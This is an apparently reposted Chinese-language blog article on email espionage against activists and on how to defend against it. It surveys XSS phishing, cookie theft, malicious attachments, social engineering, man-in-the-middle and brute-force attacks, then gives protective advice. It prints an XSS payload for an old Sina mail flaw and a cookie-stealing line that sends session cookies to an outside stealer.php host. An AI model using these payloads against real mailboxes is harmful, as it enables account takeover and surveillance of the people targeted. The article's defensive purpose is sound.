防禦郵箱間諜

如果說中國走在網絡戰爭的前沿，你可能覺得胡扯。發動網絡戰爭並不復雜，一般有三種類型：攻擊基礎設施、竊取機密數據、癱瘓網絡服務。而本文，將重點談及中國竊取機密數據的郵箱情報攻擊，幾乎從來沒有哪個國家能 像中國因維穩不惜任何代價而秘密地監聽國內外的敏感人士。

對於電子郵箱攻擊，你注意到國外媒體批露的中國攻擊事件與日俱增，如本月9號，紐約時報記者聲稱他們的郵箱被攻擊，而 Twitter上的敏感人士開始越來越多的抱怨。你可能會質疑，有何事實數據可證明他們的郵箱確被攻擊？這是一個好問題，因為他們無法跟踪攻擊來 源與防禦被攻擊，那麼，常見的攻擊手法是怎樣的？我們如何跟踪攻擊來源？又如何防禦郵箱間諜的攻擊？

一、你是局外人？還是受害者？

1月，Google向中國提出沒有審查機 制的G.cn，並聲稱有人試圖入侵中國維權人士的Gmail，14日，McAfee就IE 0day的分析，將此次大規模的竊取機密數據（知識產權）攻擊稱為極光行動。儘管Google事件餘波已去，我想說的是：極光行動為什麼沒有攻擊國內郵 箱？ ——顯然！國內的郵箱具有過濾審查機制，這 可以解釋你的郵箱為何會丟信，更重要的是，一紙紅 頭文件可未經用戶許可洩露郵件數據，若有不從，以涉黃之名拔網線威脅。
普通的用戶會這樣認為：我不是敏感人士，我不會遭到電郵攻擊。這樣的想法很美好，讓我們談談"話語權"吧。在三皇五帝的古代，罵皇帝是要砍頭，而40年代末的建 國期，是紅色的革命語，時間回溯現在的極 權主義國家，一切已然不一樣了，儘管今天的新聞媒體仍在中宣部的約束之下，但互聯網是一次革命，這個開放的網絡空間，人人都是媒體，可在 Twitter報導新聞，可用Wordpress發出聲音，意識形態的大軍是無法擊潰互聯網。
你會不會遭到電郵攻擊？與你是不是敏感人士無關，而是視乎你在網絡空間的聲音、行為，以及現實生活中身份有關係。也不能說所有的電郵攻擊都與政府脫 不了乾系，更有那些充滿好奇心、樂於惡作劇的駭客。

二、攻擊手法

你的Yahoo郵箱沒有點擊任何鏈接，但攻擊者無需密碼便控制住你的郵箱，這是什麼回 事？你的Gmail密碼相當複雜，但為何收到密碼重置的郵件？你登陸網易郵箱，點開郵件即重定向登陸入口，但網址卻是真實的，這是為何？最後，來 自國外越來越多的電郵失竊的新聞越來越多，你仍質疑中國沒有能力侵入他國政要郵箱賬戶？

1、XSS釣魚

這種攻擊仍是目前最行之有效的方法，除了Gmail目前不存在XSS漏洞外，其它的Yahoo、Hotmail、網易、騰訊、搜狐、新浪等都存在 XSS漏洞。 XSS漏洞是啥？它的全稱是Cross-site scripting，即跨站攻擊，存在此漏洞的網站，能夠被惡意攻擊者劫持，它還派生了XSRF等等形式的利用，可謂Web木馬。
08年，國內的郵箱都存在HTML標籤跨站，漏洞都很弱智，比如<img src=javascript:alert()>插在郵件標題、郵件內容、郵件附件處即可彈出一個可愛的 alert。接下來，進步一點了，還是以HTML標籤為主，搞個數據包工具看哪個變量沒過濾、以及編碼轉換。 09年，又升級了，主要是國外的郵箱Gmail、Yahoo、Hotmail改以語法過濾，能利用的是CSS標籤跨站，Gmail非常狠，除了早期存在 Google Docs附件跨站攻擊，基本把惡意代碼過濾得慘不忍睹。 Yahoo在09年亦漏洞不斷，但很負責，隔三差五地不斷升級，而Hotmail令人失望，居然1day過了一年都不補。
騰訊圈了一批牛人，忘記是Ph4nt0m還 是80sec的，比其它的網易、搜狐、新浪的郵箱安全性好一點，搜狐與新浪最 爛，透露一下，它們其中一個仍存在字符集的跨站漏洞。那麼，XSS攻擊到底是怎樣的形式呢？用一個08年截獲的新浪的HTML標籤XSS漏洞說明，此漏洞 是失效了，這年頭基本沒人直接公開0day，都養家糊口來著。

<INPUT TYPE="IMAGE" SRC="jav ascript:x7s='var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\'Cookie1 =\') == -1){document.cookie=\'Cookie1=RAY;expires=\'+Then.toGMTString();window.parent.location.href=\'http://www.google.com /sina/index.php?url=\'+location.href+\'&c=\'+document.cookie.replace(/&/g,\'xxx\');}';eval(x7s)"); ">

此漏洞的形成在於新浪郵箱沒有過濾空格，即過濾了javascript，但稍變形為jav ascript，便使得其後的惡意代碼得以執行。這段代碼有兩個功能，獲取Cookie並延長有效時間，並用父窗口 windows.parent.location重定向至釣魚網站。完整的攻擊流程是，將上述XSS代碼插入至郵件內容，以HTML模式發送郵件至受害者 郵箱，受害者點開郵件時，會迅速轉向sina釣魚網站，而轉向過程中，因採用parent，轉向時，網址不會有變化，即不會顯示釣魚網址，而受害者在釣魚 網站輸入密碼提交之，釣魚網站截取密碼再轉回真實的郵箱，由於控制了Cookie，受害者因懷疑會再次點開那封攻擊郵件，但並不會再次跳轉，這令受害者產 生一種錯覺，它以為郵箱仍是安全的。

2、竊取Cookie

你可以理解為竊取會話。你有過很多這樣的經歷，使用賬戶登陸某個網站，如Youku.com，關閉瀏覽器，再次打開youku.com，則不需要輸 入密碼，這便是Cookie的作用。 為什麼會有Cookie呢？由於Http是無狀態協議，為了在各個會話傳遞信息，因而需要Cookie或Session來標記訪客者的狀態，這裡的 Session是瀏覽器的Cookie裡帶了一個Token來標記，而服務器取得Token檢查合性後便把服務器上存儲的對應狀態和瀏覽器綁定。總的意思 就是：我只要竊取你的Cookie並保持了Session不過期，便可無須密碼訪問你的電子郵箱內容。
如果你要查看自己的Cookie，給Firefox裝個HttpFox擴展即可，如下圖。

竊取Cookie很簡單，可將上面的Javascript稍加改裝即可：<INPUT TYPE="IMAGE" SRC="jav ascript:document.location='http://www.google.com/cookie/stealer.php? cookie='+document.cookie;">，然後在stealer.php寫個保存接收的Cookie記錄的代碼即可，如果你想讓 Session不過期，自己寫個工具搞惦，每隔30秒請求一次目的頁面。 09年，Yahoo就被一幫人折騰了很多郵箱，不知道修復了沒有，國內幾個郵箱也能被利用。

3、惡意軟件

即木馬、病毒、後門、間諜、鍵盤記錄器……這些軟件，最常見算是doc、pdf病毒了，好好的一個文檔，挾帶了木馬，雙擊一打開，你就完了。最容易 受到攻擊的是西藏人士、維權人士，然而，我不得不承認，這是一種非常陰險的手段，因為這毫無任何技術含量。這個攻擊流程是，xxx部門獲取經費收購或買斷 木馬軟件、捆綁軟件，一般外包給中國公司，然後這些公司的報價奇高，各省xxx部門買了後，按照說明書配置木馬上線，再用捆綁工具與可信的文件捆在一起， 再用Google挑目標，比如找到abc.com網站，將該網站電子郵箱地址都整理出來，再用郵箱批量群發器不管三七十一把這些病毒通通發過去，再泡上一 杯茶盯著木馬軟件等著目標上線。
這種沒有採用魚叉式攻擊所導致的後果是，買的木馬軟件、捆綁軟件很快就無效了，因為一頓亂發，被安全軟件給盯上或用戶舉報查殺掉了，這個例證就是最近的IE 0day及PDF 0day很快曝光，估計這前後都不到一年。而在前文，儘管中國沒有比美國更好的網絡戰爭實力，但是不差錢，他們不需要關注技術細節，只需要知道誰 有0day，誰會挖掘0day，然後招安，買斷一堆的0day，比如Discuz!、Wordpress、Firefox漏洞，照著教程去攻擊。
那麼如何防禦這種惡意附件的攻擊？當你再次在郵箱看見一堆的PDF、DOC、HTM壓縮包時，簡單的方法是，下載後不要打開，直接上傳至 Google Docs，要是顯示一片空白或無關的內容，不管三七二十一提交到VirusTotal網站上。

4、社會工程學

這個方法很簡單，先跟你套近乎下，然後東問問西問問獲得碎片信息，基本就是掘地三層把目標的信息全收集起來，完了後，評估一下你的弱點在哪裡，再從 弱點入手，這種攻擊通常是僱傭了職業黑客來完成，因為過程比較複雜。舉例子，攻擊者有目標的郵箱，然後放到Google搜索，看目標註冊了哪些網站，把這 些網站整理，逐個把這些網站入侵了並下載數據庫，從中找到目標的網站密碼，再用網站密碼試郵箱密碼，要是目標只用一個密碼，那麼他的郵箱就完了。
總體上來說，你在網絡上的信息越少，便能夠降低被入侵的威脅。但事實並不情人願，Web2.0的社交網絡流行，你註冊了Twitter，天天嘰嘰喳 喳，一不小心把家世、住址、約會全都洩露了，你註冊了豆瓣，天天左看右瞧還加了攻擊者為好友，結果，他就知道你上網習慣與興趣愛好，然後再用策略和你聊的 特別歡，某一天，他跟你講：我找到一個非常牛B的電影了，你在Verycd下載瞧瞧。你一看，還真不錯，真是你喜歡的。然後他又講，能不能幫我登陸下 Gmail下載個文件看看是啥內容？我網速比較慢，我發你登陸密碼。你聽了，這小忙是得幫的，馬上速度登陸對方的Gmail下載了壓縮包，結果打開壓縮包 的文檔發現啥都沒，到了第二天，你就很神奇地發現，哦哦~我的豆瓣、twitter全都登陸不了……
社會工程學攻擊永不過時，因為人人都有被利用的心理弱點，不管是好心、私心、同情心啥的，都無法避免這種攻擊。不過，這項攻擊最大的缺點是，很耗時 間，短則幾天，長則幾月。這項攻擊在敏感人士的社區很常見，如Forum、Google Groups等，那些攻擊者最常見的手法盜用可信賬戶發送病毒附件。

5、MIT中間人攻擊

以ARP攻擊為例，A訪問mail.sina.com，但攻擊者B通過ARP劫持，可以使得你訪問虛假的新浪釣魚網站，而非真實的新浪。這種劫持通 信的手法可適合不同的場合，如劫持ADSL線路，這需要紅頭文件請本地電信局協助的，然後修改你的數據包返回假的數據包，舉例而言，你想從QQ官方下載 QQ程序，攻擊者修改數據包把QQ程序的下載地址改成木馬地址，結果你就可以下載個木馬回去了。如果你的通信是明文，沒有採用SSL，攻擊者可以直接看到 你密碼。不過，我不太肯定，Gmail雖然採用了SSL，但用戶名與密碼卻在網址中出現，有公司宣稱能解開SSL，我現在仍然是半信半疑。
另外一種是hosts文件劫持，典型的例子是，某個傢伙在Twitter.com說：無法訪問youtube.com？ Picasaweb？很簡單，修改hosts文件即可馬上訪問。你一聽，哇，這麼好，趕緊用記事本打開hosts文件，把對方提供的映射地址粘貼進去，再 重新打開youtube.com，哇，真神奇，打開了~~聰明的看客接下來知道會發生啥了。
對於ADSL線路劫持的手法，這種攻擊也是行之有效的。另外，我們也得對某些代理軟件保持警惕，天知道那些免費的socks5、vpn會幹出令人震 驚的事嗎？

6、暴力破解

有三種，web窮舉、smtp窮舉、雲窮舉。在多數的情況下，前兩種效率低下，且限制諸多，以Web Gmail為例，它有CAPTCHA限制、重複次數的限制，不過，我倒是碰到過一個Python版的窮舉工具，但速度很慢。至於smtp，如果服務器做了 限制的話，比如現在網易對溯雪暴力破解工具是免疫 的。雲窮舉，就我目前所知，我想這是最有效率的破解方法，已 有安全專家Electric Alchemy利用亞馬遜雲服務Amazon Ec2運行Elcomsoft工具暴力破解PGP ZIP檔案的例子。 憑藉雲計算的超級計算機，以及一個分佈式郵箱密碼破解工具，暴力破解的速度將更快速。不過，這並不切實際，因為破解的成本太高了，需要很多米米。
暴力破解，這個古老的方法在目前只能針對極少的主流電子郵箱，儘管如此，但它對那些自架設的電子郵局仍然有效，因為它們沒有CAPTCHA、重複嘗 試次數、服務器資源等限制。總的來說，暴力破解對本地的加密文件破解比較有效率，但對網絡郵箱賬戶的破解尚不能達到30%的成功率。

7、瀏覽器惡意腳本

上過流氓軟件的當吧？一旦打開IE，主頁被鎖定只能訪問某個流氓的網站，嗯，沒錯，瀏 覽器的腳本也能起到釣魚攻擊之用。比如IE的BHO(Browser Helper Object)劫持、Chrome、Firefox擴展釣魚。就目前而言Chrome、Firefox的擴展釣魚並不怎麼流行，這比較麻煩，攻擊者需寫一 個看似合法可信的擴展，並植入後門，還需要方法讓目標安裝，這費力不討好，但BHO容易多了，可以隱秘地安裝而不會有提示。要防禦這種攻擊很簡單，檢視你 的Firefox、chrome是否有陌生的擴展、插件，不要在第三方的網站安裝擴展。

8、內嵌登陸表單

這是社會工程學攻擊的一種變形。當你打開某郵件，其內容部分嵌入了登陸表單，具體就是，你會看到一個要求你輸入用戶名、密碼的登陸框。恰好RFA的 新聞《維 權人士郵箱和推特遭竊取、攻擊》公佈一張攻擊實例圖片，見下圖。

如果你的Gmail收到上述的威脅恫嚇郵件，不要擔心，請在郵件的右側點擊下拉菜單，選擇“這是網絡欺詐”，而Gmail將會稍後封鎖此攻擊者。普 通的用戶不要誤以為這是Gmail的安全漏洞，最簡單的方法，選中郵件內容查看源代碼，你可以發現並不存在惡意的Javascript腳本，而是HTML 標籤，你在源代碼找到Action位置，將其後的釣魚網站向Google舉報即可。
其它的Gmail用戶不需要擔心，這種內嵌表單釣魚方式是通殺Gmail、Hotmail、Yahoo、網易、騰訊、搜狐的郵箱，由於不存在惡意的 Javascript，可稱之良性HTML標籤利用。看到這類威脅恫嚇郵件，一是舉報釣魚郵件、釣魚網址，二是刪除該郵件，三是提醒你的朋友警惕。

三、防禦

安全不能100%保證，只能最大限度地降低威脅，更來源於用戶的安全意識。

1、防禦XSS

如果你使用的Firefox瀏覽器，可安裝NoScript擴展來屏蔽惡意的Javascript腳本。但你希望一勞 永逸的話，非常簡單，註冊一個私人Google Groups， 並設置Gmail的過濾器，所有郵件一律轉發至Google Groups。但如果也不喜歡註冊Google Groups，那麼你可以再註冊Yahoo、Hotmail郵箱，使用Yahoo收取Gmail，再用Hotmail收取Yahoo，在這過程中，特定的 XSS代碼會分崩離析。

2、防禦惡意軟件

.txt文本格式永遠是無害的（如果你的系統沒有被映像劫持）。儘管如此，但我們仍難 以避免地與.DOC、.PDF格式打交道，如果你使用的Gmail，那麼一律在線查看。而另一種可能是，你會收到RAR、7z等壓縮格式，而郵件內容也頗 具引誘性，那麼你下載之後，請右鍵解壓至單獨的文件夾，而你不認識發件人並有疑心時，永不要馬上打開，請上傳至Google Docs在線查看，或者提交到VirusTotal.com在 線查毒。最好也在郵箱的簽名行增加一行文字：我只接受.txt格式附件！其它格式附件的郵件一律刪除。

3、防禦身份盜竊

建議啟用數字簽名。它可以協助你確認簽名者的身份及數據完整性，甚至你發出的郵件，對 方能夠獲得確認，從而避免被第三方攻擊者的濫用。與此同時，雙方還可以明文約定，即在準確的時間範圍內容髮送郵件，如一般為每個星期日發送郵件，而未在此 時間範圍內的郵件而作廢。

4、防禦數據失竊

正如前文所提，你應該使用TrueCrypt加密附件。這款經典的加密工具備受讚譽，你應該保持經常 使用的習慣。

5、防禦身份洩密

你的密碼提示問題應該是模棱兩可，比如“天下有多少顆月亮？”。而在個人註冊信息處， 不要留下你真實家庭地址、身份證號、電話號碼、出生日期等信息，當你的郵箱被攻破，這些信息能夠證明你的身份。不要將這些信息設置為公開，而是保密，並阻 止在Google Profiles可見。

6、使用Chrome瀏覽器

在TippingPoint第三屆Pwn2Own黑客大會，Apple's Safari, Mozilla's Firefox和Microsoft's Internet Explorer 8全部陣亡，你應該接納黑客們的建議，使用Chrome瀏覽器，我不能保證Chrome會一直安全的，因為安全是個偽命題，就目前而言，Chrome是個 不錯的選擇。當然，下一屆的Pwn2Own王者可能會是Firefox，不管如何，IE不是個好選擇，因為中國的黑客正在折騰它。

7、使用Gmail

在我長達半年的測試，我仍然無法拿下Gmail，它太安全了，這使我鬱火，當然，我也 不能保證它也是最安全的，至少目前我沒有聽到Gmail存在安全漏洞的消息。

8、每月密碼老化

微軟聲稱，定期改密碼沒有用，只會浪費時間與金錢。 我反對這種說法，當然，他們的調查結果是針對美國企業。我的建議是，密碼請設置為12位，每月更改電子郵箱密碼。間諜與黑客不一樣，間諜才不會愚蠢地刪除 你的郵件並更改你的密碼，那不可能，他們會暗中的監視你的郵件來往情況，伺機獲得可起訴的把柄。

四、反跟踪

在你尚未成為他人的魚之前，先搞翻這位漁人。

1、阻止郵件中的媒體

如果你不想攻擊者獲取到你的IP地址、瀏覽器、操作系統等信息，你應該阻止郵件中圖片顯示。這是為什麼？顯示圖片則意味著你訪問了該圖片的服務器， 而該服務器則記錄了你的訪問數據。如果你已經安裝了IIS、Apache，那麼你可以打開http://localhost，再去查看它們的日誌信息，看 看到底有沒有記錄你的訪問信息。
而如果你沒有裝上IIS、Apache無法測試的話，你可以打開間諜豬：http://www.spypig.com/ 向自己的郵箱發送測試郵件。如果你使用的Gmail，那非常好，Gmail默認是阻止圖片顯示的。

2、跟踪發件人的來源

如果你用的Foxmail客戶端，那很簡單：郵件——郵件信息——原始信息，即可看到 發件人的IP地址。如果你使用的Gmail，你可以在郵件的右側點擊三角形的下拉框，選擇Show Original查看郵件頭，要是看的頭暈，可直接找"Received"那一行，將其後的IP地址放到www.myip.cn進行查詢，以確認發件人來自哪裡。

3、質詢

陌生人可能發送熱點事件的郵件，諸如玉樹地震死亡名單，維權人士名單，他試圖激起你的 好奇心以及人道主義、愛心等。你不應該馬上查看，而是澄清你的疑問，這份名單的出處來自哪裡？你為什麼擁有這份名單？你發送給我的理由是什麼？要是對方無 法消除你的疑問以及無回复，我建議你將這封郵件的附件下載，交提交到VirusTotal上報病毒。

4、搜索

搜索對方的郵箱地址，看看在互聯網是否有跡可尋。如果你使用Gmail，可在郵件中點 擊“Show details”看看此封郵件是否為群發郵件，如果是，直接回复所有人詢問：這封郵件帶有病毒嗎？

5、檢查過濾器

現在登陸你的Gmail，進入設置項，選擇“Filters” 標籤，檢查是否存可疑的郵箱地址，如果有，請迅速刪除，否則，你的郵件全被偷了。

五、反思

從陸戰、水戰、空戰、網戰、太空戰，全球各國都在試圖提升各個空間作戰實力，顯然，在 網戰這塊，中國是大小通吃，吃完之後還堅決反對沒吃。以Google事件為例，華爾街日報昨天的報導《谷歌攻 擊者獲得用戶識別軟件代碼》，提及攻擊者使用了谷歌工程師的工作站作為跳板，儘管我不能核實其真實性，但在《挑戰五毛黨》這篇分析文也提及 Google中國區被安插內鬼。接下來，北京政府將如何應對Google後續事件呢？吃？抑或沒吃呢？

本文轉自 可能吧